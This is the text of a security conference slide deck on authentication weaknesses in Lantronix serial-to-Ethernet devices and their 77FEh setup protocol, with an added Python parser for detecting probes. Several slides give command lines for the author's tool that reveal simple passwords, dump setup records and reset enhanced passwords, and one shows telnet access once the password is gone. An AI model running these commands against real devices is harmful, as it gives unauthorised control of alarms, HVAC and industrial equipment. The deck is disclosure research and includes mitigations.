Slide 2
Mos Eisley Lab
Who are you!?!!??
● Security Jedi at Diverto
  – Bringing balance to the force
● Experience
  – Offensive (penetration tester)
  – Defensive (developer/system administrator/...)
  – Have code in: Nmap, Metasploit, OpenVAS, …
  – Author of free software: https://github.com/kost/
● If you trust in certificates
  – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
Slide 5
You can find them as an integral part of:
● Alarms
● HVACs
● Pool monitoring systems
● Sprinkler controllers
● Hacked vacuum cleaners (Roombas)
● Embedded systems
● Industrial systems
Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
Slide 6
What are they actually running?
● OS
  – CoBos (mostly)
  – Evolution OS/Linux
  – ThreadX
  – Linux
● Support
  – 1 or more serial ports
  – Modbus (a few models)
  – 10/100 Ethernet
Slide 9
Most frequent services available – TCP/IP
● Web (tcp/80): simple web server, serving an applet JAR which talks to port 30718
● Telnet (tcp/9999): telnet administration interface
● 77FEh (tcp-udp/30718): what is this?
● SNMP (udp/161): mostly information disclosures
Slide 10
Device discovery
● Ask :)
● Look if you have physical access
● Passive
● Active/scanning
  – Standard port scanning is fine with conservative timing
  – Broadcast UDP to specific Lantronix ports (30718)
● Beware
  – Version scanning (-sV) or running vulnerability scanners may misconfigure the device
Slide 11
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
Slide 12
So, WTF is 77FEh finally?
● 0x77FE = 30718 (decimal)
● TCP/UDP protocol for device setup
  – Proprietary protocol
  – Used by DeviceInstaller (proprietary software from Lantronix)
● Designed for
  – Setup of device
  – Administration of device
  – Getting device info
  – Insecurity (sorry, had to write it, you'll see later ;) )
Slide 13
Sample 77FEh communication
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
Annotations on the dump: the 4 bytes sent are the query setup request; the first 4 bytes received are the query setup response; the response also carries the MAC address of the device (6 bytes) and the device type.
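As an added, defender-side example (not from the slides or from the lantronix-witchcraft tool), the Python below parses the 30-byte reply above into MAC address and device type, and flags datagrams that carry the 4-byte query setup request towards port 30718, so 77FEh probes seen on the network can be inventoried and alerted on. The offset of the device-type tag and the "last 6 bytes are the MAC" reading are my interpretation of the annotated dump; the traffic records are constructed.

```python
PORT_77FE = 0x77FE                                # 30718 decimal, TCP and UDP
QUERY_SETUP_REQUEST = bytes.fromhex("000000f6")   # 4-byte request from the slide
QUERY_SETUP_RESPONSE = bytes.fromhex("000000f7")  # first 4 bytes of the reply
LANTRONIX_OUI = bytes.fromhex("00204a")           # 00-20-4A block; XPort docs call it the Lantronix prefix

# Constructed sample: the 30-byte reply from the slide's hex dump, byte for byte.
SAMPLE_RESPONSE = bytes.fromhex(
    "000000f7 00108005 58324400 df0e0000 62a7d944 00000000 00204a91 84fb".replace(" ", "")
)


def parse_query_setup_response(payload: bytes) -> dict:
    """Extract identifying fields from a 77FEh query setup response.

    Layout as I read the slide: bytes 0-3 response code 0x000000f7, bytes 8-11 an
    ASCII device-type tag ("X2D" in the dump), last 6 bytes the MAC address.
    """
    if len(payload) != 30 or payload[:4] != QUERY_SETUP_RESPONSE:
        raise ValueError("not a 77FEh query setup response")
    mac = payload[-6:]
    dev_type = payload[8:12].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    return {
        "mac": ":".join(f"{b:02x}" for b in mac),
        "device_type": dev_type,
        "lantronix_oui": mac[:3] == LANTRONIX_OUI,
    }


def find_77fe_queries(records):
    """Return (src, dst) pairs of packets that look like 77FEh query setup requests.

    A record is (src_ip, dst_ip, proto, dst_port, payload). A broadcast destination
    is the "find every Lantronix on the LAN" pattern from the discovery slide.
    """
    return [(src, dst) for src, dst, _proto, dport, data in records
            if dport == PORT_77FE and data[:4] == QUERY_SETUP_REQUEST]


# Constructed traffic: broadcast probe, unicast probe, unrelated SNMP packet, device reply.
SAMPLE_RECORDS = [
    ("192.168.1.50", "192.168.1.255", "udp", 30718, QUERY_SETUP_REQUEST),
    ("192.168.1.50", "192.168.1.101", "tcp", 30718, QUERY_SETUP_REQUEST),
    ("192.168.1.50", "192.168.1.101", "udp", 161, b"\x30\x26\x02\x01\x00"),
    ("192.168.1.101", "192.168.1.50", "udp", 54321, SAMPLE_RESPONSE),
]

if __name__ == "__main__":
    print(parse_query_setup_response(SAMPLE_RESPONSE))
    print(find_77fe_queries(SAMPLE_RECORDS))
```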
Slide 15
Previous work
● Metasploit
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
● Tools
  – Simple C program by jgor
    ● https://github.com/jgor/lantronix-telnet-pw
Slide 16
But...
● Simple password is not set
● Device still asks for password
● Further digging
  – Enhanced password in place
  – You cannot get/reset the enhanced password easily
  – Length is bigger (4 -> 16)
  – Challenge!!!
Slide 17
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type             Simple Password   Enhanced Password
Length                   4                 16
Visible in query setup   yes               no
Slide 23
Enhanced password gone: no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
Slide 25
New tool: lantronix-witchcraft
● 77FEh protocol implementation
● 77FEh security related utility
● All the tricks mentioned implemented
● Free software: GPL2
● Requirement: Perl
● Available at
  – https://github.com/kost/lantronix-witchcraft
Slide 26
Basic usage:
● Display MAC address:
  – ./lantronix-witchcraft.pl -Q <ip>
● Display simple password (up to 4 characters):
  – ./lantronix-witchcraft.pl -P <ip>
● Reset security record (together with enhanced password):
  – ./lantronix-witchcraft.pl -E <ip>
● Reset security record without AES (with enhanced password):
  – ./lantronix-witchcraft.pl -S <ip>
● Dump setup records:
  – ./lantronix-witchcraft.pl -G -D <ip>
Slide 27
Brave enough?
● One command to rule them all
● Display MAC address and simple password, dump setup records, reset security records together with enhanced password:
  – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
Slide 29
Correct way
● Ask
  – Someone responsible if they could have something like that
● Send broadcast query packet to 77FEh
● Identify ports 30718 open (TCP or UDP)
● Dump setup records
● Play ;)
● Check if it is still working...
  – If yes, perfect
  – If not: huh, but you should restore setup records somehow ;)
Slide 30
It's not about Lantronix...
● ...they warned the vendors about it in their documentation
Source: Lantronix documentation
Slide 31
Disclosure problem
● It's more about vendors who implement Lantronix in their devices
● Whom to report to?
  – Lantronix – I guess they know their protocol ;)
  – OEMs – hard to find all their customers ;)
● Awareness
  – Conference
  – Tools
Slide 33
Recommendations
● Have some other device to VPN/SSL tunnel the services
● Telnet only through VPN or another secure channel to the administration interface
● Disable 77FEh if not needed
● Filter out 77FEh on network devices to allowed hosts only
● Disable other unnecessary services (SNMP, telnet, etc.)
Slide 35
Summary
● There are ways to get past authentication (if 77FEh is enabled)
  – Simple passwords
  – Enhanced passwords
● Tools
  – Metasploit Lantronix modules
  – https://github.com/kost/lantronix-witchcraft
● Recommendations
  – Disable 77FEh if not needed, or filter out 77FEh on network devices to allowed hosts only
  – Tunnel all communication to these devices over VPN/SSL
● Future
  – There are things to research: a way to obtain the enhanced password or AES keys, for example
Slide 36
Acknowledgements - Thanks
● Previous work (simple passwords)
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● https://github.com/jgor/lantronix-telnet-pw
● Colleagues
  – Dalibor Dosegović, hardware wizard